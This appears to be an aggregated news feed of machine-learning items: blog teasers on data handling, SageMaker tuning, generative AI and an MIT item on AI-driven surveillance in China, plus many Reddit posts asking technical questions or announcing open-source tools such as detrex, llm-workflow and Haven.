    Image Source: Author Introduction Data engineers and data scientists need data for their day-to-day jobs. Of course, it could be for data analytics, data prediction, data mining, building machine learning models, etc. All these are taken care of by the respective team members, and they need to work towards identifying relevant data sources, and associated with… Read More »A Detailed Guide for Data Handling Techniques in Data Science The post A Detailed Guide for Data Handling Techniques in Data Science appeared first on Data Science Central.  ( 26 min )

    Training a convolutional neural network with MATLAB: image recognition AI.
    submitted by /u/Character_Ad_1385 [link] [comments]  ( 8 min )

    Effectively solve distributed training convergence issues with Amazon SageMaker Hyperband Automatic Model Tuning
    Recent years have shown amazing growth in deep learning neural networks (DNNs). This growth can be seen in more accurate models and even opening new possibilities with generative AI: large language models (LLMs) that synthesize natural language, text-to-image generators, and more. These increased capabilities of DNNs come with the cost of having massive models that […]  ( 11 min )
  • Open

    AI-Fueled Productivity: Generative AI Opens New Era of Efficiency Across Industries
    A watershed moment on Nov. 22, 2022, was mostly virtual, yet it shook the foundations of nearly every industry on the planet. On that day, OpenAI released ChatGPT, the most advanced artificial intelligence chatbot ever developed. This set off demand for generative AI applications that help businesses become more efficient, from providing consumers with answers Read article >  ( 11 min )
    Full-Scale Gaming: ‘Dragon’s Dogma: Dark Arisen’ Comes to GeForce NOW
    Arise, members! Capcom’s legendary role-playing game Dragon’s Dogma: Dark Arisen joins the GeForce NOW library today. The RPG and THQ Nordic’s Jagged Alliance 3 are newly supported on GeForce NOW, playable on nearly any device. From Dusk Till Pawn Become the Arisen and take up the challenge in Capcom’s critically acclaimed RPG. Set in a Read article >  ( 5 min )
  • Open

    Making sense of all things data
    Abel Sanchez helps industries and executives shift their operations in order to make sense of their data and use it to help their bottom lines.  ( 8 min )
    How an “AI-tocracy” emerges
    In China, the use of AI-driven facial recognition helps the regime repress dissent while enhancing the technology, researchers report.  ( 9 min )

  • Open

    [D] Does the university/program for masters for ML/AI roles matter?
    I am curious about this. I have an undergrad in CS from a large public university in the States and 2 YOE as a SWE in India. Not now, but a few years down the line, when I have 4-5 YOE as a SWE, I want to move into ML/AI roles. I don't want to waste any more time on a full-time program and lose 1-2 more years of my 20s (I am 25 already), so I was looking for online programs from a decent university in North America. The thing about me is that I learn best by self-studying. For me personally, university prestige doesn't do anything, because they all read from slides and use the same books. I took a summer at Cornell and ended up studying on my own. So spending that much money, or taking 1-2 years off for a full-time master's, doesn't make sense for me. I just want a master's that is cheap, takes comparatively little time, and is part-time, so that I can work at the same time and keep up powerlifting and my other hobbies, and that after completion makes me eligible for non-research ML/AI roles. In all, I am only doing this to show HR on my resume that "here is a guy you won't need to spend too much time analyzing, because he has done a master's and some additional math/stats courses, and an institution has certified him because they got paid to do so". submitted by /u/ItsWasntMyFault [link] [comments]  ( 9 min )
    [D] AI Text to Image Generation Project
    I am a student of computer science. My final year project deadline is in a few weeks. I have to create an AI text-to-image generator trained on a custom dataset: the user provides a prompt and it generates an image based on that prompt. In fact it will be limited, since it will be trained on a limited custom dataset. I have searched throughout the internet but am unable to find any helpful material, code, or other resources... and those that I did find I am unable to understand because of my limited expertise. Is there anyone who could help me? submitted by /u/mufeezahmad [link] [comments]  ( 8 min )
    [D] How to do Semi Supervised Learning or Learning with no labels?
    Would appreciate some direction and pointers in this research area. Some possible options could be to use representation learning (for example an autoencoder, or an InfoNCE/contrastive loss). Is there any other good way to solve the semi-supervised learning problem, where we have partial labels for the data and want our model to do well on unlabelled instances as well? submitted by /u/Rohit901 [link] [comments]  ( 8 min )
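A common baseline for the partial-labels setting described above is self-training (pseudo-labeling), which scikit-learn ships out of the box; a minimal sketch on synthetic data, assuming unlabeled points are marked with -1:

```python
# Sketch: self-training (pseudo-labeling) with scikit-learn when only part
# of the data is labeled. Unlabeled targets are marked with -1.
import numpy as np
from sklearn.datasets import make_classification
from sklearn.linear_model import LogisticRegression
from sklearn.semi_supervised import SelfTrainingClassifier

X, y = make_classification(n_samples=500, random_state=0)
rng = np.random.default_rng(0)
y_partial = y.copy()
y_partial[rng.random(len(y)) < 0.8] = -1   # hide ~80% of the labels

# The wrapper iteratively pseudo-labels points the base model is confident on.
model = SelfTrainingClassifier(LogisticRegression(max_iter=1000), threshold=0.9)
model.fit(X, y_partial)
acc = model.score(X, y)                    # score against the true labels
print(f"accuracy with ~20% labels: {acc:.2f}")
```

Representation-learning approaches (autoencoders, contrastive pretraining) usually beat this baseline when the unlabeled pool is large, but pseudo-labeling is the cheapest thing to try first.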
    [P] Free and Fast LLM Finetuning
    Here's a colab notebook showing a new interface for LLM finetuning that I've been playing around with. Curious if folks here have feedback. Colab: https://colab.research.google.com/drive/1QMeGzR9FnhNJJFmcHtm9RhFP3vrwIkFn Docs: https://www.lamini.ai/blog/free-fast-and-furious-finetuning Github Repo: https://github.com/lamini-ai/lamini LLM fine-tuning includes several advanced optimizations:
    - Chinchilla recipe: smaller models pretrained on more data increase inference speed
    - Instruction fine-tuning: training on a small, high-quality set of instructions unlocks the knowledge learned during foundation-model training
    - Latency-constrained batching: achieves high utilization under load during token generation
    - Containerized SLURM: combines the fast scheduling of SLURM with LLM containers
    - Mixed-precision training: uses lower-precision matrix operations to speed up training
    There are so many low-hanging fruits in LLM tuning, steering, and alignment. We are just getting started on this for enterprise and open source. For this reason I disagree with Sam Altman that the age of bigger models is over. We are still leaving orders of magnitude on the table, e.g. by not including optimizations like sparsity in these models. References for inspiration: [1] https://arxiv.org/abs/2203.15556 [2] https://arxiv.org/abs/1910.10683 [3] https://www.usenix.org/system/files/osdi22-yu.pdf [4] https://www.schedmd.com/ [5] https://arxiv.org/abs/1710.03740 submitted by /u/gdiamos [link] [comments]  ( 9 min )
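Of the optimizations listed, instruction fine-tuning is mostly a data-preparation step: (instruction, response) pairs are rendered into single training strings. A minimal sketch — the template below is illustrative only, not the format any particular library (Lamini included) actually uses:

```python
# Illustrative instruction fine-tuning data prep: render (instruction,
# response) pairs into single training strings. The template is a made-up
# example, not the format of any specific finetuning library.
PROMPT_TEMPLATE = "### Instruction:\n{instruction}\n\n### Response:\n{response}"

def format_examples(pairs):
    """Render a list of {'instruction': ..., 'response': ...} dicts."""
    return [PROMPT_TEMPLATE.format(**p) for p in pairs]

examples = format_examples([
    {"instruction": "Summarize: LLMs are very large.", "response": "LLMs are big."},
])
print(examples[0])
```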
    Wind speed prediction -appreciate opinion [P]
    Thank you for reading this post. As a keen kitesurfer, I'm trying to predict the wind speed 12 hours ahead. However, so far my success has been limited. How can I improve my prediction? Data: so far I'm using wind speed & direction, temperature, and humidity at 10-minute intervals for the past 2 years for 6 locations. Features: day of the year and hour of the day. In addition, I have aggregated the 10-minute data to 1 hour and calculated the mean, min, max, and std. All the data was then made into 18 lags. Models: linear regression, k-nearest neighbors, and random forest. However, only the random forest was slightly better than the linear regression. What types of features and models would you recommend? Cheers submitted by /u/Any-Description3824 [link] [comments]  ( 8 min )
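The aggregation-plus-lags pipeline described in the post can be sketched in a few lines of pandas (the series name and synthetic data here are hypothetical; adapt to your own dataset):

```python
# Sketch: hourly aggregation + lag features + a +12h target with pandas.
# The series name and synthetic data are placeholders for the real dataset.
import numpy as np
import pandas as pd

rng = np.random.default_rng(0)
idx = pd.date_range("2023-01-01", periods=2000, freq="10min")
df = pd.DataFrame({"wind_speed": rng.gamma(2.0, 3.0, len(idx))}, index=idx)

# Aggregate 10-minute readings to hourly statistics.
hourly = df["wind_speed"].resample("1h").agg(["mean", "min", "max", "std"])

# Autoregressive lags of the hourly mean, plus the +12h prediction target.
for lag in range(1, 19):
    hourly[f"mean_lag_{lag}"] = hourly["mean"].shift(lag)
hourly["target_plus_12h"] = hourly["mean"].shift(-12)
hourly = hourly.dropna()
print(hourly.shape)
```

Since day-of-year and hour-of-day are cyclic, encoding them as sin/cos pairs usually helps linear models; tree models like random forests can use the raw integers.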
    [D] NeurIPS 2023 reviews release time?
    Hey guys, I was wondering if y’all know when NeurIPS reviews for this year would be released? I know the response period starts on August 4, but do we get to see reviews before? Are they all released at once, or gradually as reviewers finish them? Thanks! submitted by /u/Icy_Background_4524 [link] [comments]  ( 8 min )
    [R] detrex: A Strong Benchmark for Detection Transformers
    In October of last year, we open-sourced detrex as the first unified research platform focusing on DETR-based algorithms. After several version updates and a significant number of experiments, we conducted a detailed benchmarking of the DETR-based models supported by detrex. Our paper is available as a preprint on arXiv: https://arxiv.org/abs/2306.07265 and our project repo is here: https://github.com/IDEA-Research/detrex The main characteristics of detrex can be summarized as follows:
    - Fully utilizes LazyConfig as the configuration system, which is highly flexible, convenient, and easily modifiable.
    - Reproduces mainstream algorithms, surpassing the original implementations by 0.2 AP - 1.1 AP.
    - Supports many SoTA backbones including EVA, InternImage, FocalNet, Swin-T, etc.
    - Each algorithm is implemented as an independent project, ensuring no mutual interference between algorithms; users can confidently implement their own ideas based on detrex.
    - The training code is simple, consisting of approximately 200 lines, and highly customizable, allowing for easy modifications and hacks.
    - Abundant documentation and tutorials are provided.
    - Active response to issues and timely repository updates.
    Benchmark result tables are in the paper; more details can be found there. submitted by /u/Technical-Vast1314 [link] [comments]  ( 9 min )
    [D] Wondering if anyone does HPC or machine learning in Windows?
    With the increased productivity of VS Code, does anyone do their ML dev work on a Windows server? I have also been having problems running a Jupyter server on Ubuntu that accesses my GPUs; is that easier on a Windows server? submitted by /u/Studyr3ddit [link] [comments]  ( 8 min )
    [D] How vital is it to physically attend SIGGRAPH for my early career? Is it worth missing out on hiking the Pyrenees with my girlfriend?
    Bluntly: Is the added benefit of attending SIGGRAPH(instead of merely indulging in the Virtual Access stuff) worth not hiking the Pyrenees with my girlfriend? I am a graduate student specializing in computer graphics and AI stuff. I'm very intent on finding some cool career at the intersection of technology and art so I signed up for SIGGRAPH back in April. I've been scouring information on generative art, NeRFs, and anything on the cutting edge of graphics for a while now so this is obviously the right place. I'd be happy enough indulging in all the talks and demos, but I'm especially interested in the networking aspect and finding a way to give myself a leg up on discovering a promising career. I have been feverishly working to develop my career since I've gotten to grad school, so this…  ( 10 min )
    [D] What is the most efficient version of OpenAI Whisper?
    Hi everyone, I know that there are several versions of Whisper available in the open-source community (WhisperX, Whisper JAX, etc.), and I'm trying to keep up to date with the best version of the model. Specifically, I'm trying to understand the best Whisper implementation for transcribing a big batch of videos (~10k videos, ~30 min long). I'd like to know your thoughts on this. submitted by /u/paulo_zip [link] [comments]  ( 8 min )
    [R]If you have used Lime with bert ....help me out please
    If anyone has successfully implemented a LIME text explanation with a BERT model, please share your code with me. I am trying to get LIME to work for LayoutLM; BERT and LayoutLM have similar architectures, so I may find something new in your code to apply to mine. submitted by /u/Affectionate_Win2460 [link] [comments]  ( 8 min )
    [D] 📚 The Learning Corner (Andrew NG Free Ai Courses Pt. 1)
    📚 The Learning Corner (Andrew NG Free Ai Courses Pt. 1) This is a list of some of the best Ai Free courses by Andrew NG, we will release the second part of the list on our next newsletter installment (link) Generative AI with Large Language Models LangChain: Chat With Your Data LangChain for LLM Application Development How Diffusion Models Work submitted by /u/Yavero [link] [comments]  ( 8 min )
    [D] What's the status of chart-to-text
    I've been looking into solutions to transform charts into descriptions. There were great datasets introduced last year by this paper: https://arxiv.org/pdf/2203.06486.pdf But I haven't found many updates since, especially nothing super convincing. Do any of you know more? submitted by /u/Trick_Brain [link] [comments]  ( 8 min )
    [D] What are some interesting research that combine AI with the physical world
    Most of the talk these days is about LLMs. I am curious about daring AI projects that try to solve problems from the physical realm that humans can't handle, things beyond human intelligence. For instance, extracting formulas for physical behaviors whose analytical forms would be hard for humans to derive but that machine learning systems can approximate well. Or, say, teaching small machines to fly with very few components, no hardcoded formulas, and an ML system that continuously learns from trial and error. Sorry if this sounds dumb. I am just a software engineer with some interest in AI. submitted by /u/besabestin [link] [comments]  ( 8 min )
    [D] LSTM multivariate forecasting
    Hi, I'm currently working on time series forecasting in pairs, where one time series is suspected to cause the other. I also have forecasts of the causing time series, which I use to predict the other one. Note that extrapolation capabilities are required, since the forecasts of the first time series are not always in the range of the training data. I'm trying to use a simple LSTM model for the task and I tried two setups: training a model on past values of both time series plus the current value of the first time series, and training on only the past and current values of the causing time series. To my surprise, the forecasts using only the first time series, without the values of the series we're forecasting, are better. Does this make sense, or am I definitely doing something wrong? When scaling the data, do I need to scale the values of each time series separately, or scale them together? Also, what other approaches would you suggest for forecasting using another time series' data and its existing forecast? submitted by /u/soundgardener666 [link] [comments]  ( 9 min )
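On the scaling question above: a common choice is one scaler per series, fit on the training split only, so neither series' range dominates the other. A minimal sketch with synthetic data standing in for the two series:

```python
# Sketch: scale each time series with its own scaler so one series' range
# doesn't dominate the other when both feed a multivariate LSTM.
import numpy as np
from sklearn.preprocessing import StandardScaler

rng = np.random.default_rng(0)
cause = rng.normal(100.0, 20.0, size=(500, 1))            # the "causing" series
effect = 0.5 * cause + rng.normal(0.0, 5.0, size=(500, 1))

# One scaler per series, fit on training data only, reused at inference.
scaler_cause, scaler_effect = StandardScaler(), StandardScaler()
cause_s = scaler_cause.fit_transform(cause)
effect_s = scaler_effect.fit_transform(effect)

X = np.concatenate([cause_s, effect_s], axis=1)           # LSTM input features
print(X.mean(axis=0).round(6), X.std(axis=0).round(6))
```

Standardization (zero mean, unit variance) is often preferred over min-max scaling here: forecasts of the causing series may fall outside the training range, where min-max scaling would push values past [0, 1].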
    MongoDB for Semantic Search [D]
    I'm quite new to semantic search and looking for an easy-to-use database tool; been looking into MongoDB's semantic search capabilities and following this tutorial. Is anyone using MongoDB for semantic search? If so, what did you think? If not, was there a reason why? Do you have any recommendations that might help me pick the right tool to get started with vector/semantic search? submitted by /u/Important-Sun-3562 [link] [comments]  ( 8 min )
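For context on what any vector/semantic search backend (MongoDB's included) does at its core: nearest-neighbor lookup over embeddings. A toy in-memory sketch with random vectors standing in for real text embeddings:

```python
# Toy semantic search: cosine-similarity top-k over an in-memory embedding
# matrix (random vectors stand in for real text embeddings).
import numpy as np

def top_k(query: np.ndarray, corpus: np.ndarray, k: int = 3) -> np.ndarray:
    """Indices of the k corpus rows most cosine-similar to the query."""
    corpus_n = corpus / np.linalg.norm(corpus, axis=1, keepdims=True)
    query_n = query / np.linalg.norm(query)
    scores = corpus_n @ query_n
    return np.argsort(-scores)[:k]

rng = np.random.default_rng(0)
docs = rng.normal(size=(100, 32))
# A slightly perturbed copy of doc 42 should retrieve doc 42 first.
hits = top_k(docs[42] + 0.01 * rng.normal(size=32), docs)
print(hits)
```

Production systems replace this brute-force scan with approximate nearest-neighbor indexes; that indexing is the main thing dedicated vector databases add on top.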
    [R] CorrFL: Correlation-Based Neural Network Architecture for Unavailability Concerns in a Heterogeneous IoT Environment
    An interesting article that tackles a new dimension in Federated Learning (FL) termed oblique federated learning. Link: https://ieeexplore.ieee.org/abstract/document/10132049 submitted by /u/ias18 [link] [comments]  ( 8 min )
    [Discussion] Video Translation Task
    I am working on a project related to Deep Learning translations. We have YouTube videos that we are looking to translate from English to Hindi. But we want the translated audio to sync with the mouth movements of the speaker. How to go about this task? submitted by /u/arhamm40182 [link] [comments]  ( 8 min )
    [D] What do you do with imbalanced target data in a non-binary RF classification problem?
    Hey all, I’m a relatively new data scientist working on my first serious classification project. We’re predicting our target, which is made up of four categories, using the random forest classifier from sklearn. For the target, three categories have about 250 samples and the fourth has about 1200 samples. So far, I’ve just done a stratified shuffle split around the target. Is there anything else that I should make sure to do here to account for the imbalance? Currently, my model just predicts the most common category for almost all of the predictions, which gives it a decent score but makes me feel like this isn’t a useful model. Would appreciate any advice. Thanks! submitted by /u/NDVGuy [link] [comments]  ( 8 min )
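One low-effort lever for the 3x250-vs-1200 imbalance described above is the class_weight option of scikit-learn's random forest, paired with a metric that isn't fooled by majority-class predictions. A sketch on synthetic data with roughly those class proportions:

```python
# Sketch: 4-class random forest with class weighting on data that mimics
# the described imbalance (three classes of ~250 vs one of ~1200 samples).
from sklearn.datasets import make_classification
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import balanced_accuracy_score
from sklearn.model_selection import train_test_split

X, y = make_classification(
    n_samples=1950, n_classes=4, n_informative=6,
    weights=[0.128, 0.128, 0.128, 0.616], random_state=0,
)
X_tr, X_te, y_tr, y_te = train_test_split(
    X, y, stratify=y, test_size=0.25, random_state=0
)

# class_weight='balanced' upweights the rare classes in the split criterion,
# and balanced accuracy is not fooled by always predicting the big class.
clf = RandomForestClassifier(class_weight="balanced", random_state=0)
clf.fit(X_tr, y_tr)
bal = balanced_accuracy_score(y_te, clf.predict(X_te))
print(f"balanced accuracy: {bal:.3f}")
```

Also worth checking: the confusion matrix and macro-averaged F1 (per-class performance), and class_weight='balanced_subsample', which reweights within each bootstrap sample.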
    [P] Weights and biases approach -1 or 1
    Hi, I've been designing my own C code to build neural networks, mainly for a project and to mess around. It works pretty well, but I find that the weights and biases of the finished network are practically all 1, -1, or thereabouts. Is this normal? Again, the network works pretty well, it just seems a bit weird to me. I'm using it to predict hand-written characters. I'm using sigmoid as my activation function (I tried ReLU but it didn't predict too well, maybe because I train with a pretty small sample pool?). Weights and biases are randomly initialized with values between -1 and 1 and are capped during training so that they don't exceed -1 or 1. I'm thinking this might be the issue. The problem is that if I don't cap them like this, they grow and grow the closer you get to the first hidden layer. The last hidden layer would have weights and biases between -1 and 1, but the others kept getting bigger and bigger, so I ended up capping them like that to solve it. I believe this is common practice, but maybe the way I'm capping them is the problem (essentially, if a weight or bias exceeds -1 or 1 after having been corrected, I set it to -1 or 1 respectively). I'm not sure what other info I should be providing; as far as I know it's a pretty basic neural network, not doing anything too fancy. Thanks in advance. submitted by /u/Automatic-Syrup8490 [link] [comments]  ( 9 min )
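For reference, the usual alternative to initializing in [-1, 1] and hard-capping weights is a width-scaled initialization such as Xavier/Glorot (well suited to sigmoid activations), typically paired with gradient clipping rather than weight clamping. A numpy sketch (the layer sizes are just examples):

```python
# Sketch: Xavier/Glorot uniform initialization, the standard alternative to
# hand-capping weights at +/-1 in sigmoid networks.
import numpy as np

def glorot_uniform(fan_in: int, fan_out: int, rng) -> np.ndarray:
    """Weights ~ U(-limit, limit) with limit = sqrt(6 / (fan_in + fan_out))."""
    limit = np.sqrt(6.0 / (fan_in + fan_out))
    return rng.uniform(-limit, limit, size=(fan_out, fan_in))

rng = np.random.default_rng(0)
W1 = glorot_uniform(784, 128, rng)   # e.g. 28x28 input -> 128 hidden units
W2 = glorot_uniform(128, 10, rng)    # 128 hidden -> 10 output classes

# The limits shrink with layer width, keeping activations and gradients in
# a reasonable range without any hard clamp during training.
print(np.abs(W1).max(), np.abs(W2).max())
```

For the growth near the early layers described in the post, clipping the gradient norm per update is the common remedy; clamping the weights themselves (as the post does) saturates them at the cap, which matches the observed pile-up at +/-1.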
    [R] Cross-Entropy is All You Need… Or is It?
    Hey r/machinelearning! I recently wrote an article titled "Cross-Entropy is All You Need… Or is It?" where I discuss extensions to the Cross-Entropy loss to make it better when used in noisy production datasets. I've had great results on my end using this loss, so I wanted to share it with you all and get your opinions and insights! ➡️ Article link ➡️ Code & Colab link Summary: This article introduces the Smooth Generalized Cross-Entropy (SGCE) loss function, a way to address training classification models with noisy labels while still calibrating your model's confidence scores. The article demonstrates the application of SGCE on the task of Named Entity Recognition (NER), but it is applicable to many other tasks. The loss function combines the Cross-Entropy (CE) and Mean Absolute Error…  ( 9 min )
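For readers unfamiliar with the family the article builds on: the Generalized Cross-Entropy loss of Zhang & Sabuncu (2018) interpolates between CE and MAE via an exponent q. A numpy sketch of the plain GCE term (the article's "smooth" variant may differ in details):

```python
# Sketch of the Generalized Cross-Entropy (GCE) loss of Zhang & Sabuncu
# (2018): L_q(p_y) = (1 - p_y**q) / q, recovering CE as q -> 0 and MAE at
# q = 1. This is the base loss; the article's smooth variant may differ.
import numpy as np

def gce_loss(probs: np.ndarray, labels: np.ndarray, q: float = 0.7) -> float:
    """Mean GCE loss given predicted class probabilities and integer labels."""
    p_y = probs[np.arange(len(labels)), labels]
    return float(np.mean((1.0 - p_y ** q) / q))

probs = np.array([[0.9, 0.1], [0.2, 0.8], [0.6, 0.4]])
labels = np.array([0, 1, 0])
print(gce_loss(probs, labels))

# As q -> 0 this approaches the usual cross-entropy -log(p_y):
ce = float(np.mean(-np.log(probs[np.arange(3), labels])))
print(gce_loss(probs, labels, q=1e-6), ce)
```

Intermediate q trades the fast convergence of CE against the noise robustness of MAE, which is why it helps on noisy production labels.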
    [D] Are NLP jobs tied to one's own native language?
    I'm considering doing a master's in NLP but concerned if NLP jobs are tied to one's own native language- for example if I'm german native I only get NLP jobs dealing with german language etc. Is this the case or can it be broader? And is it still a wise choice to get a master's in this field? submitted by /u/dauntbooksandyou [link] [comments]  ( 8 min )
    [R] Enhancing Continuous Time Series Modelling with a Latent ODE-LSTM Approach
    https://arxiv.org/abs/2307.05126 submitted by /u/cici118 [link] [comments]  ( 8 min )
    [P] langchain-lite alternative
    Although langchain is an impressive library, I tend to find it is… a little unintuitive, at least for non-trivial examples or examples that don’t have a predefined chains/templates related, it's overly prescriptive; and the various levels of abstraction don't resonate with me related, can be difficult to debug or understand what’s happening in intermediate steps of the chain or what’s it’s actually sending OpenAI So, I built a “langchain-lite” package called llm-workflow https://github.com/shane-kercheval/llm-workflow The value proposition is basically: easily build up a sequence of tasks (e.g. prompt-template -> chat) called a workflow, where the output of one task serves as the input to the next task in the workflow track history; understand what's happening in each of the …  ( 10 min )
    [P] Haven: Deploy Open Source LLMs on Your Own Cloud
    Open source LLMs are a great privacy-preserving alternative to using the ChatGPT API, but deploying them in production is still really hard - especially for people without ML experience and knowledge about ML infrastructure. With Haven, we make it possible to deploy LLMs with just a few lines of code! GitHub: https://github.com/havenhq/haven Website: https://haven.run/ Colab Demo: https://colab.research.google.com/drive/1eGGSisS9Du5-_KcaejY5y9vk9v7EIfba?authuser=2#scrollTo=YYECIKqAGId8 Haven’s main component is the manager, which comes as a container image that can be deployed in your GCP environment. The manager is your central entrypoint and can be used to spin up LLMs on GPUs with just one line of code:

    from havenpy import Haven

    client = Haven(":50051", "")
    worker_id = client.create_inference_worker(
        model_name="@huggingface/mosaicml/mpt-7b-chat",
        quantization="float16",
        gpu_type="T4",
        gpu_count=2)

    After spinning up inference workers, you can query them with both a chat completion and a normal completion endpoint, similar to the OpenAI API.

    res = client.chat_completion(worker_id, messages=[{
        "content": "Who would win in a cagefight: Mark Zuckerberg or Elon Musk?",
        "role": "USER"
    }], stream=True, temperature=0.8)

    for r in res:
        print(r.text, flush=True, end="")

    Our inference server is powered by vLLM to provide the fastest inference possible. In the coming weeks, we plan to add support for more cloud providers as well as fine-tuning with a single line of code. We'd love to hear your feedback! submitted by /u/jger227 [link] [comments]  ( 9 min )
  • Open

    A new AI Prompt Wars game was released
    Pretty fun actually. According to the FAQs it uses Stable Diffusion to generate images from participants' prompts and then compares them to determine a winner. submitted by /u/superander [link] [comments]  ( 8 min )
    Survey for generative AI photos and how this will affect Shutterstock and Getty
    I am trying to figure out how people have been reacting to recent changes in generative AI technology and how it will affect the artistic community. It would be greatly appreciated if as many people as possible could fill out the attached survey. If you are a photographer, someone who purchases stock photos, or someone who likes to make AI images, this pertains to you. It will take one minute. Thanks. https://forms.gle/NZJaEVZBfQb1uiaM9 submitted by /u/mattyb24643 [link] [comments]  ( 8 min )
    Are there any free tools that can summarize very long video transcripts?
    All the tools I’ve seen for this can only summarize up to 10ish minutes of dialog in a free version. Looking for an hour plus. I don’t mind if the writing is worse than GPT4 or whatever, would be better than nothing submitted by /u/IndependentFormal8 [link] [comments]  ( 8 min )
    Is there an AI to generate images of ideas of websites?
    I want an AI that can generate images of websites so I can develop them for personal use; is there a tool that can do that? I tried BlueWillow, DALL-E, and Canva AI; none of them could generate it. submitted by /u/Luxy_Lockes [link] [comments]  ( 8 min )
    Holy Fuck...This is absolutely incredible. Achieving a better, more flexible result with 19 neurons instead of 100,000 neurons?!?
    submitted by /u/JakeYashen [link] [comments]  ( 8 min )
    ChatGPT Is Losing Users. Is The Artificial Intelligence Craze Over?
    submitted by /u/byteaw [link] [comments]  ( 8 min )
    Can you simulate ambience of a specific soundscape and its surroundings using AI?
    Hello guys, I am working on a song project for which I want to make an intro that resembles a port/harbor back in the 16th/17th/18th century: the sound of waves, harbor bells, people working and talking, constantly carrying cargo onto ships, and then ultimately the sounds of a ship setting sail and leaving the harbor. At first I thought I'd have to stitch many different royalty-free sounds together to simulate this ambience, but I remembered that AI is growing fast and already creating music. So I wanted to ask you guys whether it's already possible to simulate a place like this using AI, and if yes, how? This would really help me out. If you know other subreddits where I could ask, please feel free to suggest them. Thanks and have a good day! submitted by /u/space_dust0 [link] [comments]  ( 8 min )
    One-Minute Daily AI News 7/11/2023
    KPMG plans to spend $2 billion on AI and cloud services through an expanded partnership with Microsoft, aiming to incorporate AI into its core services. This move is in response to a slowdown in advisory deals and a challenging economic environment.[1] Elon Musk will host a conversation about AI with Rep. Ro Khanna (D-Calif.) and Rep. Mike Gallagher (R-Wis.) on Twitter Spaces Wednesday evening, a congressional aide confirmed to The Hill. Gallagher and Khanna have in the past stressed the need for balance in the technology, both expressing optimism about potential benefits while also sharing concerns about the potential dangers it can pose.[2] IT major Wipro announced the launch of the ai360 service and plans to invest $1 billion in AI over the next three years. The move follows Tata Consultancy Services’ announcement to train 25,000 engineers on generative AI tools.[3] IBM is considering the use of artificial intelligence chips that it designed in-house to lower the costs of operating a cloud computing service it made widely available this week, an executive said Tuesday.[4] Sources: [1] https://www.livemint.com/companies/news/kpmg-to-enter-into-a-deal-with-microsoft-spend-2-billion-in-ai-and-cloud-services-11689122323635.html [2] https://thehill.com/homenews/4092145-elon-musk-to-talk-ai-with-bipartisan-pair-of-lawmakers/ [3] https://www.livemint.com/companies/news/wipro-launches-ai360-will-invest-1-billion-into-ai-the-next-three-years-11689132228044.html [4] https://www.reuters.com/technology/ibm-mulls-using-its-own-ai-chip-new-cloud-service-lower-costs-2023-07-11/ submitted by /u/Excellent-Target-847 [link] [comments]  ( 9 min )
  • Open

    Faster training of Dueling DQN
    Hi everyone, Has anyone worked with training dueling DQN faster or sample efficient? I found papers: Fast RL with slow updates: https://github.com/amazon-science/fast-rl-with-slow-updates Sample efficient deep reinforcement learning via uncertainty estimation: https://openreview.net/forum?id=vrW3tvDfOJQ Sample efficient deep reinforcement learning via episodic backward update: https://arxiv.org/abs/1805.12375 Has anyone worked with any of these? Or do you know any other strategies that have been used to make Dueling DQN learn faster? (I have already experimented with RAINBOW, so wanted to try something on top of it) submitted by /u/mr_formaldehyde [link] [comments]  ( 8 min )
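For context on the architecture the papers above build on: the dueling head combines a state-value stream and an advantage stream with a mean-subtraction that makes the two identifiable (Wang et al., 2016). A numpy sketch of just that aggregation step:

```python
# Sketch of the dueling DQN aggregation: Q(s,a) = V(s) + A(s,a) - mean_a A(s,a).
# The mean-subtraction pins down V and A, which are otherwise only identified
# up to an additive constant.
import numpy as np

def dueling_q(value: np.ndarray, advantage: np.ndarray) -> np.ndarray:
    """value: (batch, 1); advantage: (batch, n_actions) -> Q-values."""
    return value + advantage - advantage.mean(axis=1, keepdims=True)

value = np.array([[1.0], [0.5]])
advantage = np.array([[2.0, 0.0, -2.0], [1.0, 1.0, 1.0]])
q = dueling_q(value, advantage)
print(q)   # per-state mean of Q equals the state value: 1.0 and 0.5
```

In a real network, value and advantage come from two small heads sharing a common feature trunk; the aggregation above is the only extra piece compared to a vanilla DQN.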
    The inverse reward of the same MDP gives a different result when using value iteration
    Hello, I have an MDP that consists of 2 machines, and I need to decide when to do maintenance on a machine depending on the quality of production. In one setup I created a reward structure based on the production loss of the system, and in the other a reward structure based on the throughput of the system, which is exactly the inverse of the production loss. So I would expect the result of the value iteration algorithm to be exactly the same, but it is not. Does anyone know what the reason could be, or what I can try in order to find out why this happens? In value iteration the solution should be optimal, so two different optimal solutions should not be possible. It would be really helpful if someone has an idea about this. submitted by /u/IcyWatch9445 [link] [comments]  ( 9 min )
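One thing worth checking: "inverse" rewards preserve the optimal policy only if they are a positive affine transform (r' = a·r + b with a > 0); a sign flip is a genuinely different optimization problem. A small value-iteration sketch on a random MDP (toy numbers, not the poster's model) illustrating both cases:

```python
# Sketch: value iteration on a tiny random MDP. A positive affine reward
# transform (r' = a*r + b, a > 0) yields the same greedy policy; a sign
# flip (a < 0) is a different problem and can yield a different policy.
import numpy as np

def value_iteration(P, R, gamma=0.95, iters=500):
    """P: (A, S, S) transition probs; R: (A, S) rewards -> greedy policy."""
    V = np.zeros(P.shape[1])
    Q = R.copy()
    for _ in range(iters):
        Q = R + gamma * (P @ V)      # (A, S) action values
        V = Q.max(axis=0)
    return Q.argmax(axis=0)

rng = np.random.default_rng(0)
P = rng.random((3, 5, 5))
P /= P.sum(axis=2, keepdims=True)    # normalize rows into distributions
R = rng.normal(size=(3, 5))

pi = value_iteration(P, R)
pi_affine = value_iteration(P, 2.0 * R + 7.0)   # same ordering of returns
pi_negated = value_iteration(P, -R)             # sign flip: different problem
print(pi, pi_affine, pi_negated)
```

If "throughput = C - production loss" for a constant C, the two reward structures should give identical policies; if any step makes the relation non-affine (e.g. per-state constants, rounding, or clipping), the disagreement is expected.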
  • Open

    Generative AI imagines new protein structures
    MIT researchers develop "FrameDiff," a computational tool that uses generative AI to craft new protein structures, with the aim of accelerating drug development and improving gene therapy.  ( 9 min )
  • Open

    Need help for an exam preparation task
    This is the given task. I have never seen a neural network displayed like this. What do the upward arrows in the X1 input neuron and the upper neuron in the hidden layer mean? What are the values at the hidden layer (e.g. "3.456") - are they thresholds? If yes, would I then continue with 1 and multiply it by the next weight (8.805 in that case)? The problem is that none of my friends know either and we don't know who else to ask, so we're asking reddit. https://preview.redd.it/xgq4luwnakbb1.png?width=882&format=png&auto=webp&s=d032255a5296a5451eaa7c6e5821dd2981390086 submitted by /u/SoSickBR [link] [comments]  ( 8 min )
  • Open

    How to mark a language in HTML
